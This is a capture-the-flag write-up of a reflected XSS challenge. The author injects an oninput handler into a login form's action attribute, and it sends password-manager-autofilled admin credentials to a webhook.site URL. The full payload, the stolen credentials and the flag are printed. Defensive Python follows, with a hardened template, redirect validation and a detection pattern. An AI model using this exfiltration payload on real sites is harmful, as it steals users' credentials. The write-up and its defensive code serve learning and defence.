Tags: xss 

Rating: 5.0

There is a website at `http://34.76.228.102:2003` that lets you log in with any username and password except `admin`. The `admin` account requires its real password, and logging in as admin would give us the flag. The challenge text says that admin uses a password manager, so I assumed their credentials would be filled in automatically when they open the login page.

The website also lets you submit any URL for the admin to check its security. I created a webhook using [webhook.site](https://webhook.site), and it turned out that a few seconds after posting the webhook URL to the system, I received a request from that machine.

Examining the login page, I found that `?next=` is appended to its URL. Anything we put into this parameter is reflected inside the `action` attribute of the login form. This is a classic XSS vulnerability that we can exploit. We can inject almost anything there, except `>`, which is HTML-encoded into `&gt;` on the site, so we can only operate within the attributes of the `form` element.

The idea for the payload is to set the webhook URL as the `action` attribute and add an `oninput` event handler that sends the login and password once the password manager fills them in. My initial idea for this attribute was:

```
oninput=fetch(this.action + this[0].value + `-` + this[1].value)
```

but it turned out that `+` signs are stripped, so I tried an array with the `join` method instead:

```
oninput=fetch([this.action,this[0].value,`-`,this[1].value].join(``))
```

and it worked fine. The final payload I sent was:

```
http://34.76.228.102:2003/login?next=https://webhook.site/[my_webhook_guid]?c= oninput=fetch([this.action,this[0].value,`-`,this[1].value].join(``))
```

After a couple of seconds I got a series of requests on my webhook, the last of which contained the admin's full credentials:

```
admin-WxBkJjpgzAdPsEXr
```

Logging in with these credentials displayed the flag: `hexCTF{pa55w0rd_m4nag3rs_c4n_hav3_vuln3rabilit1es_t00}`
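As an added, defender-side illustration (not code from the challenge or from this writeup), the snippet below reconstructs the flaw described above and puts a hardened version next to it. It assumes the login page reflects `?next=` into an unquoted `action` attribute and only neutralises `>`, which is what the behaviour in the writeup suggests; the `render_login_form_*`, `is_safe_next` and `classify_next` functions and the sample values are my own. The hardened version does the two things that would have stopped this payload: it refuses any `next` that is not a same-site path, and it quotes and attribute-encodes what it does reflect. `classify_next` is a small log-side check for `next=` values that carry an external origin or an `on...=` handler.

```python
import html
import re
from urllib.parse import urlsplit


def render_login_form_vulnerable(next_url: str) -> str:
    """Reconstructed vulnerable template (assumption, not the challenge's source).

    The redirect target is reflected into an UNQUOTED action attribute and only
    '>' is neutralised, so a space followed by on...= adds an event handler.
    """
    reflected = next_url.replace(">", "&gt;")
    return (
        f'<form method="post" action={reflected}>'
        '<input name="username"><input name="password" type="password">'
        "</form>"
    )


def is_safe_next(next_url: str) -> bool:
    """Allow only same-site, path-only redirect targets such as '/dashboard'.

    Rejects absolute URLs, protocol-relative '//host' forms and backslashes
    (browsers normalise '/\\host' to '//host'), so the action can never point
    at another origin.
    """
    if not next_url.startswith("/") or next_url.startswith("//"):
        return False
    if "\\" in next_url or any(ord(c) < 0x20 for c in next_url):
        return False
    parts = urlsplit(next_url)
    return parts.scheme == "" and parts.netloc == ""


def render_login_form_hardened(next_url: str) -> str:
    """Validate the target, then quote and attribute-encode it.

    html.escape(quote=True) turns '"' and "'" into entities as well as '&',
    '<' and '>', so the value cannot close the quoted attribute.
    """
    target = next_url if is_safe_next(next_url) else "/"
    return (
        f'<form method="post" action="{html.escape(target, quote=True)}">'
        '<input name="username"><input name="password" type="password">'
        "</form>"
    )


# Detection helper: whitespace followed by an on<event>= token inside a
# redirect parameter is never legitimate and is cheap to flag in access logs.
HANDLER_RE = re.compile(r"\son[a-z]+\s*=", re.IGNORECASE)


def classify_next(next_url: str) -> str:
    """Label a next= value: 'handler-injection', 'external' or 'ok'."""
    if HANDLER_RE.search(next_url):
        return "handler-injection"
    if not is_safe_next(next_url):
        return "external"
    return "ok"


if __name__ == "__main__":
    # Constructed sample values, including the payload shape from the writeup.
    samples = [
        "/account",
        "https://example.org/",
        "https://webhook.site/[my_webhook_guid]?c= oninput=fetch([this.action,"
        "this[0].value,`-`,this[1].value].join(``))",
    ]
    for value in samples:
        print(f"{classify_next(value):18} {render_login_form_hardened(value)[:60]}")
```

Run it directly to see each sample classified and the hardened form it would produce; the payload from this writeup is rejected outright and the form falls back to `action="/"`, while a plain `/account` passes through unchanged.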